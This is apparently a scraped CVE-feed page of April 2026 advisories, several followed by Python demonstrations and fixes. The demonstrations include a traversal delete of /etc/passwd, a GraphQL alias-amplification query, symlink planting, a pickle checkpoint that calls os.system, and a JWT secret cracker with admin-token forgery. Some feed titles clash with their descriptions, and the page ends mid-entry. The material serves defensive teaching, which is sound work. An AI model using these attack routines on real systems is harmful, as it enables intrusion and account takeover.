CVE Monitor
{
"Source": "CVE FEED",
"Title": "CVE-2026-35471 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in goshs",
"Content": "CVE ID :CVE-2026-35471
Published : April 6, 2026, 10:16 p.m. | 1 hour, 15 minutes ago
Description :goshs is a SimpleHTTPServer written in Go. Prior to 2.0.0-beta.3, tdeleteFile() is missing a return after its path traversal check. This vulnerability is fixed in 2.0.0-beta.3.
Severity: 9.8 | CRITICAL
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
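The bug class above (a traversal check that fires but does not stop the handler) is easy to miss in review because the rejection message is still produced. The following is an added illustration, not goshs code; goshs is written in Go, but the control-flow point is the same in Python, which is used for every example on this page. `ROOT`, the handler names and the `removed` list standing in for the real file removal are assumptions of the example.

```python
"""Delete handler with a traversal check that fails to return vs. one that does."""
import posixpath
from typing import List

ROOT = "/srv/share"   # constructed web root; not goshs' real configuration


def resolve_under_root(root: str, requested: str) -> str:
    """Join the client path under root and collapse '..' segments (posixpath: host-independent demo)."""
    return posixpath.normpath(posixpath.join(root, requested.lstrip("/")))


def is_inside_root(root: str, target: str) -> bool:
    # Compare against root + "/" so that "/srv/share2/x" does not pass a bare prefix test,
    # and refuse root itself so the handler can never delete the share directory.
    return target != root and target.startswith(root + "/")


def delete_file_vulnerable(requested: str, removed: List[str]) -> str:
    """The bug class in the advisory: the check sets an error status but execution continues."""
    target = resolve_under_root(ROOT, requested)
    if not is_inside_root(ROOT, target):
        status = "403 path traversal blocked"
        # BUG: missing `return status` here, so the removal below still happens
    else:
        status = "200 deleted"
    removed.append(target)          # stands in for the real os.remove(target)
    return status


def delete_file_fixed(requested: str, removed: List[str]) -> str:
    """Same check with an early return; nothing after it runs for a rejected path."""
    target = resolve_under_root(ROOT, requested)
    if not is_inside_root(ROOT, target):
        return "403 path traversal blocked"
    removed.append(target)
    return "200 deleted"


if __name__ == "__main__":
    hit: List[str] = []
    print(delete_file_vulnerable("../../etc/passwd", hit), hit)   # 403 ... but /etc/passwd was removed
    ok: List[str] = []
    print(delete_file_fixed("../../etc/passwd", ok), ok)          # 403 ... and nothing removed
```

Note the comparison against `ROOT + "/"` rather than `ROOT`: a bare prefix test lets a sibling directory such as `/srv/share2` through, which is the second most common mistake in these checks.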
{
"Source": "CVE FEED",
"Title": "CVE-2026-35413 - Directus GraphQL Schema SDL Disclosure Setting",
"Content": "CVE ID :CVE-2026-35413
Published : April 6, 2026, 10:16 p.m. | 1 hour, 15 minutes ago
Description :Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, when GRAPHQL_INTROSPECTION=false is configured, Directus correctly blocks standard GraphQL introspection queries (__schema, __type). However, the server_specs_graphql resolver on the /graphql/system endpoint returns an equivalent SDL representation of the schema and was not subject to the same restriction. This allowed the introspection control to be bypassed, exposing schema structure (collection names, field names, types, and relationships) to unauthenticated users at the public permission level, and to authenticated users at their permitted permission level. This vulnerability is fixed in 11.16.1.
Severity: 5.3 | MEDIUM
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-35441 - Directus Affected by GraphQL Alias Amplification Denial-of-Service Due to Missing Query Cost/Complexity Limits",
"Content": "CVE ID :CVE-2026-35441
Published : April 6, 2026, 10:16 p.m. | 1 hour, 15 minutes ago
Description :Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus' GraphQL endpoints (/graphql and /graphql/system) did not deduplicate resolver invocations within a single request. An authenticated user could exploit GraphQL aliasing to repeat an expensive relational query many times in a single request, forcing the server to execute a large number of independent complex database queries concurrently, multiplying database load linearly with the number of aliases. The existing token limit on GraphQL queries still permitted enough aliases for significant resource exhaustion, while the relational depth limit applied per alias without reducing the total number executed. Rate limiting is disabled by default, meaning no built-in throttle prevented this from causing CPU, memory, and I/O exhaustion that could degrade or crash the service. Any authenticated user, including those with minimal read-only permissions, could trigger this condition. This vulnerability is fixed in 11.17.0.
Severity: 6.5 | MEDIUM
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
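The amplification described above works because a token limit bounds query size, not the number of resolver executions a query triggers. An added example follows, written for this page and not taken from Directus: a small selection-set parser that counts naive versus deduplicated resolver invocations (identical field and arguments under different aliases counted once) and applies a field and alias budget. The `articles`/`author` schema, the budget values and the `check_query` API are assumptions of the example; the parser covers plain selection sets with aliases, arguments and directives, not fragments.

```python
"""Count resolver invocations in a GraphQL document and reject alias amplification."""
import re
from dataclasses import dataclass, field
from typing import List, Tuple

_TOKEN = re.compile(r'"(?:\\.|[^"\\])*"|[A-Za-z_]\w*|-?\d+(?:\.\d+)?|\.\.\.|[{}():\[\]!$=@|]')


@dataclass
class Selection:
    name: str
    alias: str = ""
    args: str = ""
    children: List["Selection"] = field(default_factory=list)


class _Parser:
    """Minimal recursive-descent parser for the selection-set subset used here (no fragments)."""

    def __init__(self, text: str):
        self.toks = _TOKEN.findall(text)      # whitespace and commas are simply not matched
        self.i = 0

    def peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else None

    def take(self) -> str:
        tok = self.peek()
        if tok is None:
            raise ValueError("unexpected end of query")
        self.i += 1
        return tok

    def expect(self, tok: str) -> None:
        got = self.take()
        if got != tok:
            raise ValueError(f"expected {tok!r}, got {got!r}")

    def balanced(self, open_t: str, close_t: str) -> str:
        """Consume a bracketed run such as an argument list and return it as text (used as a cache key)."""
        depth, parts = 0, []
        while True:
            tok = self.take()
            parts.append(tok)
            depth += (tok == open_t) - (tok == close_t)
            if depth == 0:
                return " ".join(parts)

    def document(self) -> List[Selection]:
        if self.peek() in ("query", "mutation", "subscription"):
            self.take()
            if self.peek() not in ("{", "("):
                self.take()                   # operation name
            if self.peek() == "(":
                self.balanced("(", ")")       # variable definitions
        return self.selection_set()

    def selection_set(self) -> List[Selection]:
        self.expect("{")
        sels = []
        while self.peek() != "}":
            if self.peek() == "...":
                raise ValueError("fragments are not supported by this demo")
            sels.append(self.selection())
        self.expect("}")
        return sels

    def selection(self) -> Selection:
        name, alias = self.take(), ""
        if self.peek() == ":":                # alias: realName
            self.take()
            alias, name = name, self.take()
        args = self.balanced("(", ")") if self.peek() == "(" else ""
        while self.peek() == "@":             # directives: skip @name and optional arguments
            self.take(); self.take()
            if self.peek() == "(":
                self.balanced("(", ")")
        children = self.selection_set() if self.peek() == "{" else []
        return Selection(name, alias, args, children)


def resolver_invocations(sels: List[Selection]) -> Tuple[int, int]:
    """(naive, deduplicated): the same field+arguments under many aliases resolves once in the latter."""
    naive, dedup, seen = 0, 0, set()
    for sel in sels:
        child_naive, child_dedup = resolver_invocations(sel.children)
        naive += 1 + child_naive
        key = (sel.name, sel.args)
        if key not in seen:                   # first occurrence wins; a real server merges the selections
            seen.add(key)
            dedup += 1 + child_dedup
    return naive, dedup


def count_aliases(sels: List[Selection]) -> int:
    return sum((1 if s.alias else 0) + count_aliases(s.children) for s in sels)


def check_query(text: str, max_naive_fields: int = 200, max_aliases: int = 20) -> dict:
    """Budget check a gateway could run before executing anything (limits are demo values)."""
    sels = _Parser(text).document()
    naive, dedup = resolver_invocations(sels)
    aliases = count_aliases(sels)
    return {"naive": naive, "dedup": dedup, "aliases": aliases,
            "allowed": naive <= max_naive_fields and aliases <= max_aliases}


# Constructed amplification query: 100 aliases of one relational field (not a real Directus schema).
AMPLIFIED = "query {\n" + "\n".join(
    f"  a{i}: articles(limit: 100) {{ id author {{ id name }} }}" for i in range(100)) + "\n}"
NORMAL = "{ articles(limit: 100) { id author { id name } } }"
```

Run `check_query(AMPLIFIED)` and the numbers make the advisory's point: 500 naive resolver calls against 5 after deduplication, from a query that is only 100 aliases long. Deduplication fixes the multiplier; the alias and field budgets are the defence-in-depth for queries that are expensive without repeating themselves, and rate limiting remains a separate control that the advisory notes is off by default.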
{
"Source": "CVE FEED",
"Title": "CVE-2026-5705 - code-projects Online Hotel Booking Booking Endpoint booknow.php cross site scripting",
"Content": "CVE ID :CVE-2026-5705
Published : April 7, 2026, 12:16 a.m. | 1 hour, 15 minutes ago
Description :A vulnerability was identified in code-projects Online Hotel Booking 1.0. Affected by this vulnerability is an unknown functionality of the file /booknow.php of the component Booking Endpoint. Such manipulation of the argument roomname leads to cross site scripting. It is possible to launch the attack remotely. The exploit is publicly available and might be used.
Severity: 5.3 | MEDIUM
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-5719 - itsourcecode Construction Management System borrowedtool.php sql injection",
"Content": "CVE ID :CVE-2026-5719
Published : April 7, 2026, 3:16 a.m. | 17 minutes ago
Description :A flaw has been found in itsourcecode Construction Management System 1.0. This affects an unknown function of the file /borrowedtool.php. Executing a manipulation of the argument code can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used.
Severity: 6.5 | MEDIUM
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2025-13044 - Multiple Vulnerabilities in IBM Concert Software",
"Content": "CVE ID :CVE-2025-13044
Published : April 7, 2026, 2:16 a.m. | 1 hour, 17 minutes ago
Description :IBM Concert 1.0.0 through 2.2.0 creates temporary files with predictable names, which allows local users to overwrite arbitrary files via a symlink attack.
Severity: 6.2 | MEDIUM
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
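The symlink attack above needs only two things: a file name the attacker can predict and a create-or-truncate open that follows links. The following is an added demonstration written for this page, not IBM code; the file name `concert-job.tmp`, the `victim.conf` target and the directory layout are constructed. It plants the link the way a local attacker would, shows the fixed-name write landing on the victim, and shows the two fixes: `O_CREAT|O_EXCL` (plus `O_NOFOLLOW`) when the name cannot change, and `tempfile.mkstemp` when it can.

```python
"""Predictable temp-file name + symlink versus atomic exclusive creation."""
import os
import tempfile

PREDICTABLE_NAME = "concert-job.tmp"   # constructed; the CVE does not name the real file


def write_temp_predictable(dirpath: str, data: bytes) -> str:
    """The CWE-377 pattern: fixed name, open() follows whatever is already at that path."""
    path = os.path.join(dirpath, PREDICTABLE_NAME)
    with open(path, "wb") as fh:          # if path is an attacker's symlink, this writes the target
        fh.write(data)
    return path


def open_fixed_name_safely(path: str) -> int:
    """If the name cannot change: fail if anything exists there, and never follow a link."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    return os.open(path, flags, 0o600)


def write_temp_safe(dirpath: str, data: bytes) -> str:
    """Preferred fix: random name, O_CREAT|O_EXCL (and O_NOFOLLOW where available), mode 0600."""
    fd, path = tempfile.mkstemp(prefix="concert-", suffix=".tmp", dir=dirpath)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path


def demo() -> dict:
    """Plant a symlink as a local attacker would, then run both patterns against it."""
    with tempfile.TemporaryDirectory() as d:
        victim = os.path.join(d, "victim.conf")
        with open(victim, "wb") as fh:
            fh.write(b"original")
        link = os.path.join(d, PREDICTABLE_NAME)
        os.symlink(victim, link)                     # attacker pre-creates the predictable name
        write_temp_predictable(d, b"attacker controlled")
        with open(victim, "rb") as fh:
            victim_after = fh.read()
        try:
            os.close(open_fixed_name_safely(link))
            excl_blocked = False
        except FileExistsError:
            excl_blocked = True                      # O_EXCL refuses an existing name, symlink or not
        safe_path = write_temp_safe(d, b"job data")
        return {"victim_after": victim_after, "excl_blocked": excl_blocked,
                "safe_name_is_random": os.path.basename(safe_path) != PREDICTABLE_NAME}


if __name__ == "__main__":
    print(demo())
```

`O_EXCL` is what makes the fixed-name variant safe: POSIX requires the open to fail with `EEXIST` when the path already exists, even as a dangling symlink, so the attacker's pre-planted link is never followed. The demo uses `os.symlink`, so it needs a platform where unprivileged symlink creation is allowed.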
{
"Source": "CVE FEED",
"Title": "CVE-2026-1839 - Arbitrary Code Execution via Unsafe torch.load() in Trainer Checkpoint Loading in huggingface/transformers",
"Content": "CVE ID :CVE-2026-1839
Published : April 7, 2026, 5:22 a.m. | 14 minutes ago
Description :A vulnerability in the HuggingFace Transformers library, specifically in the `Trainer` class, allows for arbitrary code execution. The `_load_rng_state()` method in `src/transformers/trainer.py` at line 3059 calls `torch.load()` without the `weights_only=True` parameter. This issue affects all versions of the library supporting `torch>=2.2` when used with PyTorch versions below 2.6, as the `safe_globals()` context manager provides no protection in these versions. An attacker can exploit this vulnerability by supplying a malicious checkpoint file, such as `rng_state.pth`, which can execute arbitrary code when loaded. The issue is resolved in version v5.0.0rc3.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
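The fix the advisory points at is `torch.load(..., weights_only=True)` on a PyTorch new enough to enforce it; on the older PyTorch versions it names, the practical control is to refuse to load a checkpoint whose pickle references anything but tensor-container globals. The example below is added for this page and is not transformers or PyTorch code: it disassembles the pickle with `pickletools.genops` without executing it, handles both `GLOBAL` (protocol 3 and below) and `STACK_GLOBAL` (protocol 4 and above, including memoised module names), and unwraps torch's zip container, where the pickle sits at `<archive>/data.pkl`. The allowlist of modules and the `rng_state/data.pkl` member name are assumptions of the demo; the malicious checkpoint is constructed here and is scanned, never unpickled.

```python
"""Triage a PyTorch-style checkpoint for code-executing pickle globals without loading it."""
import io
import os
import pickle
import pickletools
import zipfile
from typing import List

# Assumption for this demo: modules a plain tensor/state_dict checkpoint may legitimately reference.
ALLOWED_MODULES = {"collections", "torch", "torch._utils", "torch.storage",
                   "numpy", "numpy.core.multiarray", "_codecs"}
_STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE", "BINUNICODE",
               "SHORT_BINUNICODE", "BINUNICODE8"}


def scan_pickle_bytes(data: bytes, allowed=ALLOWED_MODULES) -> List[str]:
    """Return every 'module.name' global outside `allowed`, by disassembling the stream only."""
    flagged, memo, recent, last = [], {}, [], None
    for op, arg, _pos in pickletools.genops(data):
        name = op.name
        if name in _STRING_OPS:                      # a string constant pushed on the stack
            last = arg
            recent = (recent + [arg])[-2:]
        elif name == "MEMOIZE":                      # memo[len(memo)] = top of stack
            memo[len(memo)] = last
        elif name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = last
        elif name in ("GET", "BINGET", "LONG_BINGET"):
            last = memo.get(arg)                     # memoised value re-pushed on the stack
            if isinstance(last, str):
                recent = (recent + [last])[-2:]
        elif name == "GLOBAL":                       # protocol <= 3: "module name" inline
            module, qualname = arg.split(" ", 1)
            if module not in allowed:
                flagged.append(f"{module}.{qualname}")
            last = None
        elif name == "STACK_GLOBAL":                 # protocol >= 4: module and name taken from the stack
            if len(recent) < 2:
                raise ValueError("malformed pickle: STACK_GLOBAL without two strings")
            module, qualname = recent
            if module not in allowed:
                flagged.append(f"{module}.{qualname}")
            last = None
        else:
            last = None
    return flagged


def scan_checkpoint(blob: bytes) -> List[str]:
    """Accept a raw pickle or torch's zip container, whose pickle lives at <archive>/data.pkl."""
    if blob[:2] != b"PK":
        return scan_pickle_bytes(blob)
    flagged = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for member in zf.namelist():
            if member.endswith("data.pkl"):
                flagged += scan_pickle_bytes(zf.read(member))
    return flagged


def _zip_checkpoint(member: str, payload: bytes) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member, payload)
    return buf.getvalue()


class _Payload:
    """Constructed attacker object: unpickling it would run os.system("echo pwned")."""
    def __reduce__(self):
        return (os.system, ("echo pwned",))


def build_malicious_checkpoint() -> bytes:
    # Mimics an rng_state.pth zip whose pickle carries a REDUCE on os.system; never load this.
    return _zip_checkpoint("rng_state/data.pkl", pickle.dumps({"cpu": _Payload()}, protocol=4))


def build_benign_checkpoint() -> bytes:
    # Nothing but containers and scalars, so no GLOBAL/STACK_GLOBAL opcodes at all.
    return _zip_checkpoint("rng_state/data.pkl",
                           pickle.dumps({"python": [1, 2, 3], "seed": 42}, protocol=4))


if __name__ == "__main__":
    print("malicious:", scan_checkpoint(build_malicious_checkpoint()))
    print("benign:   ", scan_checkpoint(build_benign_checkpoint()))
```

The scanner reports `posix.system` (or `nt.system` on Windows) for the constructed file and nothing for the benign one. It is a pre-load triage step, not a sandbox: anything it flags should be rejected outright rather than loaded "carefully", and on a PyTorch that supports it `weights_only=True` should still be passed.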
{
"Source": "CVE FEED",
"Title": "CVE-2025-65115 - Remote Code Execution Vulnerability in JP1/IT Desktop Management 2 and JP1/NETM/DM",
"Content": "CVE ID :CVE-2025-65115
Published : April 7, 2026, 5:19 a.m. | 16 minutes ago
Description :Remote Code Execution Vulnerability in JP1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management 2 - Operations Director on Windows, Job Management Partner 1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management - Manager on Windows, Job Management Partner 1/IT Desktop Management - Manager on Windows, JP1/NETM/DM Manager on Windows, JP1/NETM/DM Client on Windows, Job Management Partner 1/Software Distribution Manager on Windows, Job Management Partner 1/Software Distribution Client on Windows. This issue affects JP1/IT Desktop Management 2 - Manager: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; JP1/IT Desktop Management 2 - Operations Director: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; Job Management Partner 1/IT Desktop Management 2 - Manager: from 10-50 through 10-50-11; JP1/IT Desktop Management - Manager: from 09-50 through 10-10-16; Job Management Partner 1/IT Desktop Management - Manager: from 09-50 through 10-10-16; JP1/NETM/DM Manager: from 09-00 through 10-20-02; JP1/NETM/DM Client: from 09-00 through 10-20-02; Job Management Partner 1/Software Distribution Manager: from 09-00 through 09-51-13; Job Management Partner 1/Software Distribution Client: from 09-00 through 09-51-13.
Severity: 8.8 | HIGH
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-0740 - Ninja Forms - File Upload <= 3.3.26 - unauthenticated arbitrary file upload",
"Content": "CVE ID :CVE-2026-0740
Published : April 7, 2026, 5:16 a.m. | 20 minutes ago
Description :The Ninja Forms - File Uploads plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'NF_FU_AJAX_Controllers_Uploads::handle_upload' function in all versions up to, and including, 3.3.26. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The vulnerability was partially patched in version 3.3.25 and fully patched in version 3.3.27.
Severity: 9.8 | CRITICAL
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-20446 - Microsoft Secure Boot integer overflow allows local denial of service and physical device compromise",
"Content": "CVE ID :CVE-2026-20446
Published : April 7, 2026, 4:17 a.m. | 1 hour, 19 minutes ago
Description :In sec boot, there is a possible out of bounds write due to an integer overflow. This could lead to local denial of service, if an attacker has physical access to the device, with User execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09963054; Issue ID: MSV-3899.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-20432 - Huawei Modem Out-of-Bounds Write Privilege Escalation Vulnerability",
"Content": "CVE ID :CVE-2026-20432
Published : April 7, 2026, 4:17 a.m. | 1 hour, 19 minutes ago
Description :In Modem, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: MOLY01406170; Issue ID: MSV-4461.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-20433 - Huawei Modem Out-of-Bounds Write Privilege Escalation",
"Content": "CVE ID :CVE-2026-20433
Published : April 7, 2026, 4:17 a.m. | 1 hour, 19 minutes ago
Description :In Modem, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: MOLY01088681; Issue ID: MSV-4460.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-20431 - Modem Remote Denial of Service Vulnerability",
"Content": "CVE ID :CVE-2026-20431
Published : April 7, 2026, 4:16 a.m. | 1 hour, 19 minutes ago
Description :In Modem, there is a possible system crash due to a logic error. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01106496; Issue ID: MSV-4467.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-5465 - Amelia <= 2.1.3 - insecure direct object reference to authenticated (employee+) privilege escalation via 'externalid' parameter",
"Content": "CVE ID :CVE-2026-5465
Published : April 7, 2026, 7:16 a.m. | 22 minutes ago
Description :The Booking for Appointments and Events Calendar – Amelia plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.1.3. This is due to the `UpdateProviderCommandHandler` failing to validate changes to the `externalId` field when a Provider (Employee) user updates their own profile. The `externalId` maps directly to a WordPress user ID and is passed to `wp_set_password()` and `wp_update_user()` without authorization checks. This makes it possible for authenticated attackers, with Provider-level (Employee) access and above, to take over any WordPress account — including Administrator — by injecting an arbitrary `externalId` value when updating their own provider profile.
Severity: 8.8 | HIGH
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2025-15611 - Popup Box AYS Pro < 5.5.0 - Admin+ Stored Cross-Site Scripting (XSS) via CSRF",
"Content": "CVE ID :CVE-2025-15611
Published : April 7, 2026, 7:16 a.m. | 22 minutes ago
Description :The Popup Box WordPress plugin before 5.5.0 does not properly validate nonces in the add_or_edit_popupbox() function before saving popup data, allowing unauthenticated attackers to perform Cross-Site Request Forgery attacks. When an authenticated admin visits a malicious page, the attacker can create or modify popups with arbitrary JavaScript that executes in the admin panel and frontend.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-1114 - Improper Access Control via Weak JWT Token in parisneo/lollms",
"Content": "CVE ID :CVE-2026-1114
Published : April 7, 2026, 7:16 a.m. | 22 minutes ago
Description :In parisneo/lollms version 2.1.0, the application's session management is vulnerable to improper access control due to the use of a weak secret key for signing JSON Web Tokens (JWT). This vulnerability allows an attacker to perform an offline brute-force attack to recover the secret key. Once the secret key is obtained, the attacker can forge administrative tokens by modifying the JWT payload and resigning it with the cracked secret. This enables unauthorized users to escalate privileges, impersonate the administrator, and gain access to restricted endpoints. The issue is resolved in version 2.2.0.
Severity: 9.8 | CRITICAL
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
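The attack path above is entirely offline: one captured token carries its own HMAC, so every candidate secret can be tested locally and the server never sees a failed attempt. The example below is added for this page and is not lollms code; it implements HS256 signing and verification from the standard library, the offline brute force, the forgery step, and the deployment-time check that would have prevented it. The claim names `sub`/`role`, the weak secret and the five-word list are constructed for the demo.

```python
"""HS256 secret recovery and token forgery, the attack path the advisory describes."""
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional

MIN_HS256_SECRET_BYTES = 32   # RFC 7518 §3.2: an HS256 key MUST be at least 256 bits


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64url(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, secret: bytes) -> str:
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """Return the claims if the signature matches, else None (alg pinned to HS256)."""
    header, body, sig = token.split(".")
    if json.loads(_unb64url(header)).get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _unb64url(sig)):
        return None
    return json.loads(_unb64url(body))


def crack_hs256_secret(token: str, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline brute force: one captured token is enough, no requests to the server."""
    header, body, sig = token.split(".")
    msg, target = f"{header}.{body}".encode(), _unb64url(sig)
    for guess in candidates:
        if hmac.compare_digest(hmac.new(guess, msg, hashlib.sha256).digest(), target):
            return guess
    return None


def forge_admin_token(captured: str, secret: bytes) -> str:
    """Re-sign the captured claims with the recovered secret, privilege claims flipped."""
    claims = verify_hs256(captured, secret)
    if claims is None:
        raise ValueError("secret does not verify the captured token")
    claims = dict(claims, sub="admin", role="admin")   # hypothetical claim names
    return sign_hs256(claims, secret)


def secret_is_acceptable(secret: bytes) -> bool:
    """Startup check: refuse to run with a signing secret below the RFC minimum length."""
    return len(secret) >= MIN_HS256_SECRET_BYTES


WEAK_SECRET = b"secret"                                                # constructed weak deployment secret
WORDLIST = [b"password", b"123456", b"admin", b"secret", b"changeme"]  # constructed tiny wordlist

if __name__ == "__main__":
    captured = sign_hs256({"sub": "alice", "role": "user"}, WEAK_SECRET)
    recovered = crack_hs256_secret(captured, WORDLIST)
    print("recovered secret:", recovered)
    print("forged claims:", verify_hs256(forge_admin_token(captured, recovered), recovered))
    print("secret acceptable:", secret_is_acceptable(WEAK_SECRET))
```

Two points the demo makes concrete: `hmac.compare_digest` on the server side does not help here, because the attacker never talks to the server while guessing; and the length check is the cheap fix, since a 32-byte random secret (`secrets.token_bytes(32)` at provisioning time) is outside any wordlist. Rotating the secret after the fix is mandatory, as every token signed under the weak one remains forgeable until it is.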
{
"Source": "CVE FEED",
"Title": "CVE-2026-1900 - Link Whisper Free < 0.9.1 - Unauthenticated Settings and User Meta Update",
"Content": "CVE ID :CVE-2026-1900
Published : April 7, 2026, 7:16 a.m. | 22 minutes ago
Description :The Link Whisper Free WordPress plugin before 0.9.1 has a publicly accessible REST endpoint that allows unauthenticated settings updates.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-4079 - SQL Chart Builder < 2.3.8 - Unauthenticated SQL Injection",
"Content": "CVE ID :CVE-2026-4079
Published : April 7, 2026, 7:16 a.m. | 22 minutes ago
Description :The SQL Chart Builder WordPress plugin before 2.3.8 does not properly escape user input as it is concatenated to SQL queries, making it possible for attackers to conduct SQL Injection attacks against the dynamic filter functionality.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2025-65116 - Buffer Overflow Vulnerability in JP1/IT Desktop Management 2 and JP1/NETM/DM",
"Content": "CVE ID :CVE-2025-65116
Published : April 7, 2026, 6:16 a.m. | 1 hour, 22 minutes ago
